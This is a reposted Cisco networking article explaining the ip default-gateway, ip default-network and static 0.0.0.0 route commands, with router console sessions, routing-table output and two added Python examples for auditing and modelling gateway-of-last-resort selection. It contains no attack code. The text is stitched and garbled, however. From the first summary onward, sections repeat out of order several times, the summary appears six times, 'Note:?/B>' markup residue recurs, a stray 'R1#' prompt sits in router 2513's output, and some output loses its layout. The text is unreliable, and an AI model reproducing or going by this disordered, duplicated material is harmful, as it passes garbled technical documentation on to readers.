July 22, 2005

From the official Cisco website
ip default-gateway, ip default-network, and ip route 0.0.0.0 0.0.0.0

ip default-gateway

The ip default-gateway command differs from the other two commands. It should only be used when ip routing is disabled on the Cisco router.

For instance, if the router is a host in the IP world, you can use this command to define a default gateway for it. You might also use this command when your low-end Cisco router is in boot mode in order to TFTP a Cisco IOS® Software image to the router. In boot mode, the router does not have ip routing enabled.

This example defines the router on IP address 172.16.15.4 as the default route:

ip default-gateway 172.16.15.4

ip default-network

Unlike the ip default-gateway command, you can use ip default-network when ip routing is enabled on the Cisco router. When you configure ip default-network, the router considers routes to that network for installation as the gateway of last resort on the router.

For every network configured with ip default-network, if a router has a route to that network, that route is flagged as a candidate default route. This network diagram displays the routing table taken from router 2513:


2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S    198.10.1.0/24 [1/0] via 161.44.192.2

Note the static route to 198.10.1.0 via 161.44.192.2 and that the gateway of last resort is not set. If you configure ip default-network 198.10.1.0, the routing table changes to this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
R1#
2513#show ip protocols
2513#

The gateway of last resort is now set as 161.44.192.2. This result is independent of any routing protocol, as shown by the show ip protocols command at the bottom of the output.

You can add another candidate default route by configuring another instance of ip default-network:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
2513(config)#ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#ip default-network 171.70.24.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S       171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

After the ip default-network command was entered in the output above, the network was not flagged as a default network. The Flag a Default Network section explains why.

Flag a Default Network

Note: The ip default-network command is classful. This means that if the router has a route to the subnet indicated by this command, it installs the route to the major net. At this point neither network has been flagged as the default network. The ip default-network command must be issued again, using the major net, in order to flag the candidate default route.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#
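The fallback shown above changes where all otherwise-unrouted traffic leaves the router, so it is worth checking from saved output. The following is an added example, not Cisco code: it parses `show ip route` text copied from this page, reports a change in the gateway of last resort between two snapshots, and compares candidate defaults with an approved next-hop set. The function names and the approved set are assumptions made for the illustration.

```python
"""Audit the gateway of last resort in saved `show ip route` output."""
import re
from typing import List, NamedTuple, Optional, Set

IP = r"\d+\.\d+\.\d+\.\d+"
GATEWAY_RE = re.compile(
    rf"^Gateway of last resort is (?:not set|({IP}) to network ({IP}))$")
# Parent line, e.g. "161.44.0.0/24 is subnetted": children inherit the mask.
PARENT_RE = re.compile(rf"^\s*\*?\s*{IP}/(\d+) is (variably )?subnetted")
# Route entry: code field (may carry "*"), prefix, then next hop or interface.
ROUTE_RE = re.compile(
    rf"^\s*(?P<code>[A-Za-z][A-Za-z0-9* ]{{0,3}}?)\s+"
    rf"(?P<addr>{IP})(?:/(?P<len>\d+))?\s+"
    rf"(?:\[\d+/\d+\] via (?P<nh>{IP})|is directly connected, \S+)")


class Route(NamedTuple):
    code: str                 # "S", "C", "R", ...
    candidate: bool           # True when the entry carries the "*" flag
    prefix: str               # e.g. "198.10.1.0/24"
    next_hop: Optional[str]   # None for directly connected routes


class Snapshot(NamedTuple):
    gateway: Optional[str]    # None when the output says "not set"
    network: Optional[str]
    routes: List[Route]


def parse_show_ip_route(text: str) -> Snapshot:
    gateway = network = parent_len = None
    routes: List[Route] = []
    for line in text.splitlines():
        m = GATEWAY_RE.match(line.strip())
        if m:
            gateway, network = m.group(1), m.group(2)
            continue
        m = PARENT_RE.match(line)
        if m:
            # "variably subnetted" children print their own mask.
            parent_len = None if m.group(2) else m.group(1)
            continue
        m = ROUTE_RE.match(line)  # legend and prompt lines do not match
        if m:
            length = m.group("len") or parent_len
            prefix = f"{m.group('addr')}/{length}" if length else m.group("addr")
            code = m.group("code")
            routes.append(Route(code.replace("*", "").strip(), "*" in code,
                                prefix, m.group("nh")))
    return Snapshot(gateway, network, routes)


def gateway_changed(before: Snapshot, after: Snapshot) -> bool:
    return (before.gateway, before.network) != (after.gateway, after.network)


def audit(snapshot: Snapshot, approved: Set[str]) -> List[str]:
    """Return findings for a snapshot given the approved next hops (a policy input)."""
    findings = []
    if snapshot.gateway is None:
        findings.append("gateway of last resort is not set")
    elif snapshot.gateway not in approved:
        findings.append(f"gateway of last resort {snapshot.gateway} "
                        f"(network {snapshot.network}) is not approved")
    for r in snapshot.routes:
        if r.candidate and r.next_hop not in approved:
            findings.append(
                f"candidate default {r.prefix} via {r.next_hop} is not approved")
    return findings


# Output copied from this page (legend shortened): two candidates, then the
# table after the static route to 171.70.24.0 was removed.
TWO_CANDIDATES = """2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
"""
AFTER_REMOVAL = """2513#show ip route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#
"""

if __name__ == "__main__":
    before = parse_show_ip_route(TWO_CANDIDATES)
    after = parse_show_ip_route(AFTER_REMOVAL)
    print("changed:", gateway_changed(before, after))
    for finding in audit(before, {"161.44.192.2"}):
        print("finding:", finding)
```
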

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. The network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note: IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 command was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
router-3(config)#^Z
router-3#

router-3#show ip route
Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
       U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

     170.170.0.0/24 is subnetted, 2 subnets
C       170.170.2.0 is directly connected, Serial0
C       170.170.3.0 is directly connected, Ethernet0
S*   0.0.0.0/0 [1/0] via 170.170.3.4
router-3#
router-3#

Note: If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance, then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise, if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.
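The classful behavior from the Flag a Default Network section and the selection order in the note above can be replayed in a small model. This is an added example, not Cisco code and not how IOS is implemented: list order stands in for the order `show ip route` prints, all function names are hypothetical, and pairing the 0.0.0.0/0 route with router 2513's routes is constructed for the illustration.

```python
"""Simplified model of `ip default-network` flagging and gateway selection."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Route:
    prefix: ipaddress.IPv4Network
    next_hop: str
    ad: int = 1               # administrative distance (1 = static route)
    candidate: bool = False   # the "*" flag in `show ip route`


def route(prefix: str, next_hop: str, ad: int = 1, candidate: bool = False) -> Route:
    return Route(ipaddress.ip_network(prefix), next_hop, ad, candidate)


def major_net(address: str) -> ipaddress.IPv4Network:
    """Classful major network of an address: class A /8, B /16, C /24."""
    first = int(address.split(".")[0])
    if first < 128:
        plen = 8
    elif first < 192:
        plen = 16
    elif first < 224:
        plen = 24
    else:
        raise ValueError("class D/E addresses have no major network")
    return ipaddress.ip_network(f"{address}/{plen}", strict=False)


def ip_default_network(table: List[Route], address: str) -> str:
    """Apply `ip default-network <address>` to the table; report what happened."""
    major = major_net(address)
    target = ipaddress.ip_address(address)
    if target == major.network_address:
        # Argument is a major net: flag the route to it, if one exists.
        for r in table:
            if r.prefix == major:
                r.candidate = True
                return "flagged"
        return "no-route"
    # Argument is a subnet: a route to the major net is installed via the
    # subnet address, and nothing is flagged yet.
    for i, r in enumerate(table):
        if r.prefix.network_address == target:
            table.insert(i, Route(major, address))
            return "installed-major-route"
    return "no-route"


def gateway_of_last_resort(table: List[Route]) -> Optional[Tuple[str, str]]:
    """Pick (next hop, network) among candidates as the note describes:
    lowest administrative distance, then an ip default-network candidate
    ahead of a 0.0.0.0/0 route, then the entry listed first."""
    ranked = sorted((r.ad, r.prefix.prefixlen == 0, i)
                    for i, r in enumerate(table) if r.candidate)
    if not ranked:
        return None
    best = table[ranked[0][2]]
    return best.next_hop, str(best.prefix.network_address)


def page_table() -> List[Route]:
    """Router 2513 after `ip route 171.70.24.0 ...` (connected routes omitted)."""
    return [route("171.70.24.0/24", "131.108.99.2"),
            route("198.10.1.0/24", "161.44.192.2", candidate=True)]


if __name__ == "__main__":
    table = page_table()
    for arg in ("171.70.24.0", "171.70.0.0"):
        print(arg, ip_default_network(table, arg), gateway_of_last_resort(table))
```
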

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note:?/B>IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

